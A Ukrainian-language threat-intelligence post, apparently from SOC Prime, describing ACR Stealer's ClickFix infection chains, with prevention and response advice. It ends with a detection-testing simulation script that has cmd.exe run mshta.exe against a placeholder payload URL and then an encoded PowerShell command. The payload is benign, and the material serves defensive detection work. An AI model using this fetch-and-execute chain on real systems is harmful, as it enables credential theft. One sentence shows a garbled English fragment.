SOC Prime Bias: Високий

20 Jul 2026 06:25 UTC

ACR Stealer: Два спостережені ланцюги проникнення під час підвищеної активності загроз

Author Photo
SOC Prime Team linkedin icon Стежити
ACR Stealer: Два спостережені ланцюги проникнення під час підвищеної активності загроз
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

ACR Stealer – це шкідливе програмне забезпечення для викрадення інформації, яке використовує соціальну інженерію в стилі ClickFix для націлювання на корпоративні середовища. Програмне забезпечення працює через два основні ланцюги інфекції: один, що базується на доставлених через WebDAV даних з Python-завантажувачами та командним центром на основі блокчейну, і інший, що використовує MSHTA з доставкою стеганографічних навантажень. Його основна мета – викрасти облікові дані браузера, токени автентифікації та конфіденційні документи.

Розслідування

Microsoft Defender Experts спостерігали підвищену активність між кінцем квітня та серединою червня 2026 року. Розслідування виявило два окремих шляхи виконання: кампанію на диску з використанням Python і запланованих завдань, і безфайлову кампанію, що використовує MSHTA та виконання шеллкоду у пам’яті. Аналітики також задокументували розширені методи уникнення, включаючи підробку часу, обфускацію PowerShell та блокчейн-підтримувані резолвери.

Запобігання

Організації повинні навчати користувачів розпізнавати запити ClickFix та обмежувати виконання ненадійних скриптів через контроль додатків. Зменшення впливу на малвертайзинг і нав’язування веб-фільтрації можуть допомогти зірвати початкові спроби доступу. Укріплення кінцевих точок шляхом обмеження залежності від збережених у браузері облікових даних та забезпечення багатофакторної автентифікації також є важливим для зменшення ризику викрадення облікових даних.

Реагування

Якщо така активність виявлена, уражені пристрої слід негайно ізолювати, а всі потенційно скомпрометовані облікові дані та токени повинні бути оновлені. Сеансові токени слід відкликати, а слідчі повинні перевірити вихідні з’єднання з підозрілими віддаленими ресурсами або сервісами для розміщення зображень. EDR в режимі блокування слід використовувати для стримування загрози та ефективного видалення шкідливих артефактів.

Потік Атаки

Виконання симуляції

Передумова: Перевірка телеметрії та базового стану повинна бути успішна.

Обґрунтування: Цей розділ детально описує точне виконання техніки супротивника (TTP), розробленої для запуску правила виявлення. Команди та викладення ПОВИННІ безпосередньо відображати ідентифіковані TTP та прагнути згенерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або не пов’язані приклади приведуть до неправильної діагностики.

  • Оповідання та команди атаки: Супротивник націлює користувача на підроблену “помилку браузера” (ClickFix). Як тільки користувач копіює та вставляє команду в термінал, запускається cmd.exe. Команда інструктує is invoked. The command instructs mshta.exe зв’язатися з віддаленим URL для отримання шкідливого скрипту. Щоб далі ухилятися від простого виявлення рядків, скрипт використовує powershell.exe з закодованою командою (-Enc), щоб завантажити та виконати шкідливе програмне забезпечення ACR Stealer в пам’яті, оминаючи традиційне сканування на основі файлів.

  • Скрипт регресійного тестування:

    # Симуляція ланцюга ClickFix для шкідливого ПЗ ACR Stealer
    # Крок 1: Симуляція обгортки cmd.exe
    # Крок 2: Виклик mshta.exe з URL
    # Крок 3: Потім закодована команда PowerShell
    
    $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulating ACR Stealer Payload Execution'"))
    
    Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand"
  • Команди очищення:

    # Жодні постійні файли не створюються в цій симуляції, але переконайтеся, що не залишаються сирітські процеси
    Stop-Process -Name "mshta" -ErrorAction SilentlyContinue
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue